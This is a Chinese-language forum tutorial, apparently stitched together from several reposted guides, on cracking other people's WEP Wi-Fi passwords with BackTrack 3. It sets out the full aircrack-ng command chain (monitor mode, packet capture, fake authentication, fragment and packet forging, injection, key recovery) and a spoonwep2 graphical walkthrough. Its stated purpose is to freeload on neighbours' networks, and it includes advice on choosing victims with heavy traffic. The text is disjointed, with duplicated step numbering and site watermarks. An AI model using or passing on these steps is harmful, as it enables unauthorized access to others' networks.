BT3完美最全破解教程

注意：不是所有的无线网卡都支持BT3，请百度确认你的支持，我的本带的不支持，USB的支持。有一些很常见的软件如WirelessMonV3Pro，MAXDOS我没有给出下载自己，自己百度解决。破解过程：一、下解BT3,我喜欢到官网下载，下面是官网页面，下载那个BT3USB的。Description:USBVersion(Extended)Name::bt3final_usb.isoSize:784MBMD5:5d27c768e9c2fef61bbc208c78dadf22SHA1:3aceedea0e8e70fff2e7f7a7f3039704014e980fDownload:Clickhere二、下载WirelessMonV3Pro，用来获取你周围的热点的基本信息关键是它所在的信道和它的MAC地址三、硬盘安装解压到一个将BT3FINALUSB解压到一个FAT３２分区，运行DOS（MAXDOS那种都行），运行解压出的文件夹下的\boot\dos\BT3，启动BT3。登陆系统的帐号为root和toor（就是root倒过来写），然后再运行startx，进图形界面。四、BT3下的破解工作以下分割线部分引自发的一个图文教程，附件中有带全部图片的PDF文件的下载地址（我只有２５６K的权限，只能想到这个办法了，谁叫我想尝试一下收费呢）----------------------------------------------------------------------------------------------------------2．启动BT3,打开一个窗口，输入ifconfig–a查看网卡（顺便记下自己网卡的mac，后面要用到）我的网卡是rausb0再输入ifconfig–arausb0加载usb网卡驱动3.输入airmon-ngstartrausb06激活网卡的Monitor模式本文来自注册机之家后面的6是你要破解ap的工作频道根据实际，换成你破解的ap的实际工作频道（下同）。4.输入抓包命令，抓包并查看你要破解的ap的essidmac输入命令airodump-ng--ivs-wname-c6rausb0，其中，name是热点的ESSID，rausb0是你破解用的网卡接口名（下同），这样，你的窗口将显示一个工作站，可以看到你要破解的ap的essid和mac，并记下ap的essid和mac。5.上面窗口不关闭，另开一个窗口，输入命令，用自己的网卡连接要破解的ap输入aireplay-ng-10-eap的essid-aap的mac-h自己网卡的macrausb0这时，系统将回显SendingAuthenticationRequestAuthenticationsuccessfulSendingAssociationRequestAssociationsuccessful:-)6．输入aireplay-ng-5-bap的mac-h自己网卡的macrausb0来获得xor文件如果一切顺利，系统将回显Usethispacket?输入y回车，将得到一个至关重要的xor文件。再输入ls查看当前目录，你将看到刚才生成的一个后缀名为xor的文件。7．输入packetforge-ng-0-aap的mac-h自己网卡的mac-k255.255.255.255-l255.255.255.255-yfragment-××××-××××.xor-wmrarp其中，–l中的l是L的小写，别和1混淆，而其中的××××-××××.xor是你刚才生成的文件名。系统回显：Wrotepacketto:mrarp8．输入aireplay-ng-2–rmrarp-x1024rausb0，发包攻击.其中，-x1024是限定发包速度，避免网卡死机，我选择的是1024。输入y回车攻击开始这时，前面的抓包窗口上的data将迅速增加。本文来自注册机之家到数据增加到3万以上时，另开窗口，启动aircrack-ng-n64-bap的macname-01.ivs其中64是64位密码，如果是128位，换成128即可。----------------------------------------------------------------------------------------------------------补充上面的说明：１，第６步需要多尝试几次，有时就是一次不会成功，最好能换个方向或者地方来尝试；２，第８步有很多时候发了攻击也没有快速增加，如果不行，改１０２４为其他数字如５１２多尝试几次。３，得到的密码是10位ASCII码，记下来，退回XP，直接填到要密码的地方就可以了。最近在苹果网上看到一篇帖子，《网上风行无线蹭网秘笈破解密码只需10分钟》，看完后，心里一直痒痒，迫不及待的上网搜索了起来。看来自从离开黑鹰之后，咱这黑心还是存在的。网上搜索了下，晕了，各种方法、秘籍，好像不要钱一样全铺在网上。仔细看了一下，全是利用Linux系统来进行破解无线网密码的，有用Ubuntu的，有用BT3。其实二者都是Linux系统，只是作者不同，打造的系统界面也不同。找了很多篇文章，其中大部分都是利用命令行模式来进行破解的，这对于大部分人来说相当于看天书。今天我给大家介绍一个用图形界面的就可以进行破解教程。只需用鼠标点几下，不到20分钟，密码就能暴出来了。喜欢命令行模式的朋友也不用担心，我会给出其他破解方式的链接的。大家不要看WEP生成的密码那么多位，其实破解起来快的话，10分钟就出来了，所以最好还是做些安全措施吧下边是命令行格式，估计很多朋友看不懂，只是留给需要的人，迫不及待的朋友请往下拉Ubuntu命令行破解无线密码命令行破解无线网密码下用WinAirCrack破解无线网密码、准备工作一台电脑或者一台笔记本电脑一块无线网卡（或者笔记本内置无线网卡）1G的U盘，Vmware，刻录机三者有其一即可（推荐用U盘）以下两个列表分别是经过测试可用BT3进行破解无线网络的无线网卡和笔记本，请大家对照一下，其实没有你自己网卡的型号也无所谓，可以试一下，因为自己在电脑店打工，随便拿了一台也没管是啥型号的就破解成功了。汗一下~~~笔记本型号:Laptops网卡型号:Wireless2、下载BT3或BT4BT3全称BackTrack3，这是一个linux环境的便携系统，可以放到U盘或者光盘中启动，对本身硬盘没有影响，无需在本地安装，现在已经有BT4的BETA版了，喜欢尝鲜的朋友可以试一下是圈内非常著名的黑客攻击平台，说白了就是一个封装好的Linux操作系统，内置大量的网络安全检测工具以及黑客破解软件等。BT3因可以方便的破解无线网络而出名，其中内置的spoonwep是一个非常强悍的图形化破解WEP无线网络密码的工具。官方网站下载地址链接其中有ISO格式，U盘格式，还有虚拟机Vmware格式的，大家各取所需，这里我用的是U盘版（工具比较全），为什么？大家没看到那个Extended么？3、下载Spoonwep2Spoonwep2这个软件。非常方便，能够先扫描，再选择，不用再输入MAC，破解IV也是自动的，无须在命令行下输入烦琐的命令。spoonwep2是在原来的版本基础之上的更新之作，让使用者可以更加方便的进行对无线网络的扫描、抓包或者注入抓包，破解密码。互联网上有很多基于BT3进行WEP密码破解的教程，都是用的spoonwep2做的范例。而BT3中默认装的是spoonwep，所以赶快升级吧，免得到时候版本不对搞的自己莫名其妙。spoonwep2下载地址：、安装将U盘清空，把刚才的bt3final_usb.iso解开到U盘，大约780M，共两个目录/BOOT/和/BT3/把spoonwep2.lzm解压缩到U盘上，放到/BT3/modules/下面打开BOOT目录，运行bootinst.bat有可能出错提示要加-f参数，原因是系统把U盘认成了“本地磁盘”而非“可移动磁盘”。然后再运行bat，安装就成功了。如果你的系统是把U盘认成“可移动磁盘”那就无须添加-f。5、启动制作完启动U盘之后，插入U盘，重启，将BIOS设置成U盘启动即可，我们就可以进入BT3系统了首页面有很多选项，我们选择第一个BT3GRAPHICSMODEKDE就可以了，进去后，可以看到漂亮的黑色BACKTRACK的Linux系统桌面6、破解如图所示，在菜单栏中单击即可启动spoonwep2，或者在终端窗口里输入“spoonwep”，也能启动。选择无线网卡，选择无线网卡，根据自己的选吧（实在不会都都试一下，看哪个能搜到信号就用哪个）驱动选normal，因为作为攻击端，我们并不清楚对方WEP的密码是多少，所以选unknownvictim。选好后点下面的next。进入“VictimsDiscovery”。点右边LAUNCH，系统开始扫描周边的无线网络。搜索信号完成后，会看到很多无线网络（如果你没搜到，不是网卡选择错误就是附近没人用无线网络）选择其中一个，在软件下方会看到此AP的客户端，选择其中DATA比较多的一台（因为我们是根据分析数据包来破解密码的，所以数据包越多破解的速度越快）选择后，如图所示我们有4种攻击方式，2种分析数据模式（64位或者128位），都选择好，点击LAUNCH，等就可以了下图右下角是破解成功的例子，红色即为WEP密码注：本教程由FORECE整理收藏，转载请注明基本上DATA比较快的话，搜索大概15-20分钟就会出密码了，碰到对方下载那就更好了，如果对方在写WORD，聊QQ的话。。。。。。。。换一台吧。3.将虚拟光驱中的文件也就是BT3，BOOT这两件文件夹copy到U盘中去Snap2.jpg4.点击开始-运行，输入CMD,然后回车，进入命令行模式Snap4.jpg输入U盘的盘符，我的为I:，然后回车输入cdboot回车输入bootinst.bat回车，就会开始制作BT3setup1.JPG开始制作时，会出现这样的画面，大概意思就是，此操作将会重写U盘的MBR(即引导区)，如果此分区是您的一个硬盘上的分区，那您的Windows系统将会启动不了，请小心,按Ｘ键中止操作，按其他任意键继续制作我就是在Ｕ盘上操作的,所以不用理会，按任意键就可以了setup2.JPG上面的图，是制作完成后的提示，设置引导记录成功，按任意键退出制作制作的过程很快，大概不到十秒，其他，他只是重新写了一下Ｕ盘的引导区就ＯＫ了到此为止，此Ｕ盘就可以引导系统进去bt3了当然，您的电脑如何设置成Ｕ盘启动就是您的问题了，我的是USBHDD启动的----------------------------------------------------我是下流的分割线------------------------------------------------------破解:引导系统进入BT3的